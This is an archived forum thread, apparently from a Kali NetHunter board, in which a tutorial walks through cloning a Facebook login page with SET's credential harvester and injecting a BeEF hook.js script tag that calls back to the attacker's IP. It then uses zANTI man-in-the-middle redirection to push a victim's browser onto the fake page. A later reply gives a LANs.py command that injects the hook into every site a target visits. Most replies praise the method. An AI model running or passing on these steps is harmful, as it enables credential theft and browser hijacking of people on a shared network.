View Full Version : Tutorial: Easy Beef-XSS hook

2014-12-19, 02:29
Hi all, just wanted to share something I found useful while pentesting my devices at home, hooking a browser with beef-xss and getting login credentials at the same time.

Start off by starting SET (Kalimenu -> 6 -> 3 ), then choose options 1, 2, 3, 2 (Credential harvester method) and enter your IP address. Next, choose option 2 and clone a site with a login, I chose for example facebook.

Next you need to chmod index.html to 755 so people can access your webpage
chmod 755 /var/www/index.html.

Next we'll inject the hook.js code into the index.html file. insert the following after <head> and before </head> .
<script type="text/javascript" src="http://<youripaddress>:3000/hook.js"></script>

Now is a good time to start up your apache server and launch beef-xss (Kalimenu -> 6 -> 2) and log in to the beef-xss web ui.

Next we'll start zANTI on your NetHunter device and scan the network. Target the computer you want to hook in the list by clicking on it and then going to "Man in the Middle".
Press the cogwheel next to "Redirect HTTP" and enter the IP of your device running beef-xss, then enable it. Finally press "on" in the top right corner to enable MITM.

If you try accessing the internet from the attacked computer now it should automatically load up your fake facebook-site (or whichever site you chose) and the browser should be hooked in beef-xss for further exploits.

Thanks for reading. And please let me know if there's any errors or if there's any improvements that can be made :)

2014-12-19, 21:44
what do you mean by " insert the following after [head] somewhere."

2014-12-19, 23:30
what do you mean by " insert the following after [head] somewhere."
Insert the code in between the <head> tags (eg, after <head> and before </head> in index.html

2014-12-20, 01:50
Insert the code in between the <head> tags (eg, after <head> and before </head> in index.html

ok thank you.

2014-12-20, 19:30
That's actually really creative. Great tutorial.

2014-12-20, 22:33
That's actually really creative. Great tutorial.

Thank you very much :)

2014-12-23, 03:29
This is a really great tutorial, thanks a lot!

2015-03-18, 01:15
Check out LANs.py on github works like...

./LANs.py -h [For help]
./LANs.py -b http://192.168.0.x:3000/hook.js [ Replace the LAN IP with whatever the network IP is that your given from the router will then should do a scan using nbtscan might need to apt-get install nbtscan pick target ctrl+c type the targets ip in from there it will inject the hook.js into every website the target go's to ]

2015-03-20, 11:53
That's great. Thanks your sharing :)

2015-03-26, 14:41
a great share
Thank you very much

2016-01-08, 17:21
Thanks very much, unknownpwn.

2016-01-11, 23:59
The tutorial is just wonderful
Works for me now,thanks again!